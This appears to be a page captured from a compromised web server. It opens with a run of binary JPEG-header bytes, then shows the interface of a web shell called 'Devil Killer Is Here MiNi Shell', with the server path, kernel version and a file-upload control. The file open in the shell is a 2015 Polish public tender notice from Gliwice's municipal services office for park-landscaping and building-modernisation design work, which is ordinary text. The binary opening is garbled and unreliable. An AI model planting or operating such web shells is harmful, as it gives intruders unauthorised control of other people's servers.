JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150420/89254-N-2015.html

<p class="kh_header"><b>Gliwice: Wykonanie projektów budowlanych i wykonawczych zagospodarowania terenów oraz modernizacji budynków</b><br>
<b>Numer ogłoszenia: 89254 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Usług Komunalnych , ul. Strzelców Bytomskich 25c, 44-109 Gliwice, woj. śląskie, tel. 032 2310031, 3350444, faks 032 2310032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuk.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów budowlanych i wykonawczych zagospodarowania terenów oraz modernizacji budynków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZEŚĆ I - projekt zagospodarowania terenów przy ul.H.Sawickiej oraz przy ul.Jesiennej
A. Projekt zagospodarowania terenu zieleńca przy ul. Hanki Sawickiej.
Opis przedmiotu zamówienia.
W zakres opracowania projektu budowlanego i wykonawczego wchodzi:
1. Projekt instalacji elektrycznych:
- usunięcie starych słupów oświetleniowych,
- projekt oświetlenia (zasilanego z alternatywnych źródeł - solarny i na wiatr).
2. Projekt małej architektury:
- demontaż starych i rozmieszczenie nowych ławek oraz koszy (w tym wprowadzenie 2-ch zestawów koszy do segregacji odpadów),
- rozmieszczenie stojaków na rowery (w kształcie litery U).
3. Projekt ciągów pieszych:
- rozbiórka starych alejek,
- projekt alejek - nawierzchnia z kolorowej kostki brukowej.
4. Projekt siłowni na wolnym powietrzu:
- rozmieszczenie urządzeń siłowych - 7 szt.,
- projekt nawierzchni pod urządzeniami siłowymi - z kostki brukowej.
5. Projekt zieleni:
- założenie nowych trawników dywanowych z siewu,
- projekt nasadzeń drzew (z odtworzeniem szpaleru głogów) i krzewów,
- wysypanie miejsc nasadzeń korą.
B. Projekt zagospodarowania terenu przy ul. Jesienna - przy zbiornikach wodnych.
Opis przedmiotu zamówienia.
W zakres opracowania projektu budowlanego i wykonawczego wchodzi:
1. Projekt instalacji elektrycznych:
- projekt oświetlenia,
- przyłącze elektryczne (skrzynka elektryczna).
2. Projekt ciągów pieszych i małej architektury:
- rozmieszczenie ławek oraz koszy,
- rozmieszczenie stojaków na rowery (w kształcie litery U),
- projekt alejek (z wykorzystaniem istniejących przedeptów) - nawierzchnia z kolorowej kostki brukowej.
3. Projekt zieleni:
- założenie nowych trawników dywanowych z siewu,
- projekt nasadzeń drzew i krzewów,
- wysypanie miejsc nasadzeń korą.
CZEŚĆ II - projekt zagospodarowania terenu przy ul.Sikorskiego
Aktualizacja i poszerzenie projektu zagospodarowania terenu przy ul. Sikorskiego wokół hali sportowej i Zespółu Szkół Ekonomiczno-Technicznych.
Opis przedmiotu zamówienia.
W zakres opracowania projektu budowlanego i wykonawczego wchodzi:
1. Projekt instalacji elektrycznych:
- projekt oświetlenia,
- przyłącze elektryczne (skrzynka elektryczna).
2. Projekt prac rozbiórkowych, ciągów komunikacyjnych i małej architektury:
- rozbiórka starej nawierzchni asfaltowej,
- projekt nowych ciągów komunikacyjnych - z kostki brukowej,
- uwzględnienie i wydzielenie drogi p. pożarowej,
- projekt nowego wjazdu i wyjazdu (droga jednokierunkowa) na teren skweru,
- projekt miejsc parkingowych przed szkołą oraz przy skwerze,
- rozmieszczenie nowych ławek oraz koszy,
- demontaż waz betonowych z terenu skweru,
- projekt dwóch boksów na odpady - jeden na potrzeby hali sportowej a drugi na potrzeby szkoły,
3. Projekt zieleni:
- założenie nowych trawników dywanowych z siewu,
- projekt nasadzeń drzew i krzewów,
- wysypanie miejsc nasadzeń korą,
- uwzględnienie w kosztorysie ewentualnej wycinki drzew (o decyzję wystąpi Zespół Szkół Ekonomiczno-Technicznych).
Uwaga: aktualizacja istniejącego projektu wraz z poszerzeniem o dodatkowe działki nr 1681 i fragment działki nr 1682 obręb Sośnica.
CZEŚĆ III - projekt zagospodarowania Lasu Komunalnego przy ul.Chorzowskiej
Projekt zagospodarowania fragmentu Las Komunalny przy ul. Chorzowskiej.
Opis przedmiotu zamówienia.
W zakres opracowania projektu budowlanego i wykonawczego wchodzi:
1. Projekt instalacji elektrycznych:
- projekt oświetlenia - kontynuacja istniejącego (z założeniem zastosowania lamp kompozytowych z ledowym źródłem światła, o kształcie zbliżonym do istniejących),
- przyłącze elektryczne (skrzynka elektryczna) - w razie konieczności.
2. Projekt małej architektury i ciągów komunikacyjnych:
- rozmieszczenie ławek oraz koszy,
- rozbiórka istniejących nawierzchni,
- projekt alejki do jazdy na rolkach (z wykorzystaniem istniejących alejek na terenie lasu i dopasowaniem się do ich szerokości) - nawierzchnia np. z cienkiej warstwy asfaltu.
Ustalenia do przedmiotu zamówienia wspólne dla części I, II, III :
1. Wykonanie trzech wstępnych koncepcji do wyboru przez Zamawiającego (za wyjątkiem Lasu Komunalnego).
2. Uzyskanie w imieniu Zamawiającego wszelkich uzgodnień i zgody właścicieli wszelkiej infrastruktury znajdującej się na terenach objętych opracowaniem (m.in. uzgodnienie projektu oświetlenia z Wydziałem PU Urzędu Miejskiego oraz firmą TAURON).
3. Uzyskanie zgody Zarządu Dróg Miejskich na wykonanie prac na działkach określonych użytkiem dr.
4. Uzyskanie w imieniu Zamawiającego z Wydział Architektury i Budownictwa Urzędu Miejskiego pozwolenia na budowę (lub dokonanie zgłoszenia).
5. Wykonanie specyfikacji technicznej wykonania i odbioru robót.
6. Wykonanie osobnego kosztorysu inwestorskiego i przedmiaru robót do każdego z wymienionych projektów (projekt oświetlenia, placu zabaw, zieleni itp.).
7. Dostarczenie do siedziby Zamawiającego 5 egzemplarzy projektu budowlanego i 5 egzemplarzy projektu wykonawczego oraz 2 egzemplarzy specyfikacji technicznych, kosztorysu i przedmiaru robót.
8. Dostarczenie do siedziby Zamawiającego 2 egzemplarzy płyt CD z pełną dokumentacją (projekt budowlano-wykonawczy, specyfikacja techniczna, kosztorys inwestorski i przedmiar robót winny być zapisane na nośniku elektronicznym w formie plików pdf).

CZEŚĆ IV - projekt modernizacji budynku nr 1010 oraz części budynku nr 1013 zlokalizowanych na terenie Giełdy Samochodowej
A. Wykonanie projektu modernizacji budynku nr 1010
Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest wykonanie projektu modernizacji budynku nr 1010 złożonego z hali produkcyjnej, łącznika i części biurowo - socjalnej zlokalizowanego na terenie Gliwickiej Giełdy Samochodowej. Powierzchnia obiektu - około 2012 m2, w tym hala produkcyjna - 1586 m2, łącznik - 32 m2, części biurowo - socjalna - 394 m2
Zakres modernizacji:
- częściowe zamurowanie otworów okiennych
- częściowa wymiana ślusarki okiennej i drzwiowej
- roboty wyburzeniowe
- roboty murarskie
- roboty tynkarskie
- roboty malarskie
- remont toalet: płytkowanie ścian, posadzek, wymiana armatury i białego montażu
- naprawa posadzek w hali
- roboty elektryczne i instalacyjne
Do obowiązków projektanta będzie należało uzyskanie mapy do celów projektowych jeżeli będzie to konieczne, uzyskanie wszelkich niezbędnych uzgodnień i pozwoleń oraz uzyskanie pozwolenia na budowę lub uzyskanie potwierdzenia przyjęcia zgłoszenia wykonania robót nie wymagających pozwolenia na budowę. Oferta powinna zawierać koszt nadzoru autorskiego nad realizacją zadania (należy przewidzieć minimum 4 wizyty na placu budowy w czasie trwania prac budowlanych).
Zakres opracowania
- inwentaryzacja budowlana - 3 egz.
- projekt budowlany - 5 egz.
- projekt wykonawczy - 5 egz.
- kosztorys inwestorski - 2 egz.
- przedmiar robót - 4 egz.
- Specyfikacja techniczna wykonania i odbioru robót - 2 egz.
- wersja elektroniczna dokumentacji na płycie CD
Zamawiający udzieli wykonawcy pisemnego pełnomocnictwa do reprezentacji MZUK w celu uzyskania niezbędnych do wykonania projektu uzgodnień. Koszt wszelkich materiałów niezbędnych do wykonania projektu, map do celów projektowych i ich aktualizacji oraz innych pomocniczych materiałów, dokumentów i prac uznanych przez wykonawcę za niezbędne należy ująć w oferowanej cenie.
UWAGA: Zamawiający nie dysponuje inwentaryzacją budowlaną przedmiotowego obiektu.
B. Wykonanie projektu modernizacji części budynku nr 1013
Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest wykonanie projektu modernizacji części budynku nr 1013 (hala produkcyjna) zlokalizowanego na terenie Gliwickiej Giełdy Samochodowej. Powierzchnia obiektu - około 800 m2.
Zakres modernizacji:
- częściowe zamurowanie otworów okiennych
- częściowa wymiana ślusarki okiennej i drzwiowej
- roboty wyburzeniowe
- roboty murarskie
- roboty tynkarskie
- roboty malarskie
- remont toalet: płytkowanie ścian, posadzek, wymiana armatury i białego montażu
- naprawa posadzek w hali
- roboty elektryczne i instalacyjne
Do obowiązków projektanta będzie należało uzyskanie mapy do celów projektowych jeżeli będzie to konieczne, uzyskanie wszelkich niezbędnych uzgodnień i pozwoleń oraz uzyskanie pozwolenia na budowę lub uzyskanie potwierdzenia przyjęcia zgłoszenia wykonania robót nie wymagających pozwolenia na budowę. Oferta powinna zawierać koszt nadzoru autorskiego nad realizacją zadania (należy przewidzieć minimum 4 wizyty na placu budowy w czasie trwania prac budowlanych)
Zakres opracowania
- inwentaryzacja budowlana - 3 egz.
- projekt budowlany - 5 egz.
- projekt wykonawczy - 5 egz.
- kosztorys inwestorski - 2 egz.
- przedmiar robót - 4 egz.
- Specyfikacja techniczna wykonania i odbioru robót - 2 egz.
- wersja elektroniczna dokumentacji na płycie CD
UWAGA: Zamawiający nie dysponuje inwentaryzacją budowlaną przedmiotowego obiektu.

WYMAGANIA DLA WSZYSTKICH CZĘŚCI :
Zamawiający udzieli pisemnego pełnomocnictwa do reprezentowania MZUK w celu uzyskania materiałów wyjściowych w sprawach dotyczących uzgodnienia i realizacji w/w projektu.
UWAGA:
Koszt wszelkich materiałów wyjściowych, mapy do celów projektowych, ich aktualizacji oraz innych prac pomocniczych uznanych przez wykonawców za niezbędne, jak również uzgodnień obligatoryjnych należy ująć w oferowanej cenie usługi.

W przypadku konieczności wykonania jednokrotnej aktualizacji kosztorysów inwestorskich, Wykonawca będzie zobowiązany do ich zaktualizowania na wezwanie Zamawiającego w ramach wynagrodzenia określonego w umowie (koszt aktualizacji kosztorysów należy uwzględnić w cenie ryczałtowej zamówienia).

Dokumentacja projektowa zostanie przygotowana zgodnie z ustawą Prawo zamówień publicznych (w szczególności art. 29, 30, 31 ustawy Prawo zamówień publicznych) i obowiązującymi aktami wykonawczymi do ustawy Prawo zamówień publicznych, które będą gwarantować bezpośrednie ich użycie w procedurze udzielenia zamówienia publicznego na wykonanie projektowanego zadania.

Prace projektowe w rozumieniu zapisów niniejszej SIWZ obejmują wykonanie projektu architektoniczno-budowlanego, projektu wykonawczego, innych projektów, przedmiarów
robót, kosztorysów, rysunków, szkiców, a także dokonanie wszelkich innych prac i czynności koniecznych do uzyskania przewidzianych prawem aktów administracyjnych
uprawniających do rozpoczęcia robót budowlanych oraz prac i czynności umożliwiających
wykonanie obiektu budowlanego na podstawie rezultatu prac projektowych.

Wykonawca zobowiązany jest do zapoznania się z Polityką Bezpieczeństwa Pracy oraz Polityką Środowiskową obowiązującymi w MZUK.*
Wykonawca zobowiązany jest do stosowania zasad środowiskowych, bezpieczeństwa i higieny pracy dla dostawców towarów, usług i robót budowlanych obowiązujących w MZUK.*
* - dokumenty dostępne na stronie internetowej www.mzuk.gliwice.pl pod hasłem Certyfikat ISO.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0, 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający wymaga wniesienia wadium w kwocie: 400,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, to znaczy - o zamówienie w każdej części mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy usługi o zbliżonym zakresie do przedmiotu zamówienia:
- o wartości nie mniejszej niż 20.000 zł brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz i dowody potwierdzające należyte wykonanie należy ograniczyć wyłącznie do usług potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia opisanego powyżej;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę osób reprezentujących Zamawiającego/ Wykonawcę na podstawie powiadomienia stron bez konieczności aneksowania umowy.
2) Zmiany przedstawicieli uczestników wykonywanej dostawy.
3) Zmiany nazwy lub siedziby Zamawiającego/Wykonawcy.
4) Zawieszenia przez Zamawiającego wykonania usługi lub rezygnacji z wykonania części usług z jednoczesnym obniżeniem wynagrodzenia z tytułu umowy.
5) Zmiany terminu realizacji umowy w przypadku przedłużających się procedur uzyskania wymaganych uzgodnień / pozwoleń/ zezwoleń z przyczyn niezawinionych przez Wykonawcę,
6) Zmiany będące następstwem: klęski żywiołowej, siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego 
do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie przedmiotu umowy w całości lub części. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej, uniemożliwiających wykonanie przedmiotu umowy w terminie.
7) Zmiany obowiązujących przepisów prawnych w zakresie terminu i sposobu realizacji umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzuk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Usług Komunalnych, ul. Strzelców Bytomskich 25 C, 44-109 Gliwice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2015 godzina 11:30, miejsce: Miejski Zarząd Usług Komunalnych ul. Strzelców Bytomskich 25c 44-109 Gliwice Sekretariat lub listownie na adres zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> projekt zagospodarowania terenów przy ul.H.Sawickiej oraz przy ul.Jesiennej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakres opracowania projektu budowlanego i wykonawczego wchodzi:
1. Projekt instalacji elektrycznych
2. Projekt małej architektury:
3. Projekt ciągów pieszych
4. Projekt siłowni na wolnym powietrzu
5. Projekt zieleni:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin złożenia do zamawiającego pełnej dokumentacji projektowej wraz z potwierdzeniem złożenia wniosku - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> projekt zagospodarowania terenu przy ul.Sikorskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Projekt instalacji elektrycznych
2. Projekt prac rozbiórkowych, ciągów komunikacyjnych i małej architektury
3. Projekt zieleni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin złożenia do zamawiającego pełnej dokumentacji projektowej wraz z potwierdzeniem złożenia wniosku - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> projekt zagospodarowania Lasu Komunalnego przy ul.Chorzowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Projekt instalacji elektrycznych
2. Projekt małej architektury i ciągów komunikacyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin złożenia do zamawiającego pełnej dokumentacji projektowej wraz z potwierdzeniem złożenia wniosku - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> projekt modernizacji budynku nr 1010 oraz części budynku nr 1013 zlokalizowanych na terenie Giełdy Samochodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu modernizacji budynku nr 1010 złożonego z hali produkcyjnej, łącznika i części biurowo - socjalnej zlokalizowanego na terenie Gliwickiej Giełdy Samochodowej. Powierzchnia obiektu - około 2012 m2, w tym hala produkcyjna - 1586 m2, łącznik - 32 m2, części biurowo - socjalna - 394 m2
Zakres modernizacji:
- częściowe zamurowanie otworów okiennych
- częściowa wymiana ślusarki okiennej i drzwiowej
- roboty wyburzeniowe
- roboty murarskie
- roboty tynkarskie
- roboty malarskie
- remont toalet: płytkowanie ścian, posadzek, wymiana armatury i białego montażu
- naprawa posadzek w hali
- roboty elektryczne i instalacyjne
B. Wykonanie projektu modernizacji części budynku nr 1013
Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest wykonanie projektu modernizacji części budynku nr 1013 (hala produkcyjna) zlokalizowanego na terenie Gliwickiej Giełdy Samochodowej. Powierzchnia obiektu - około 800 m2.
Zakres modernizacji:
- częściowe zamurowanie otworów okiennych
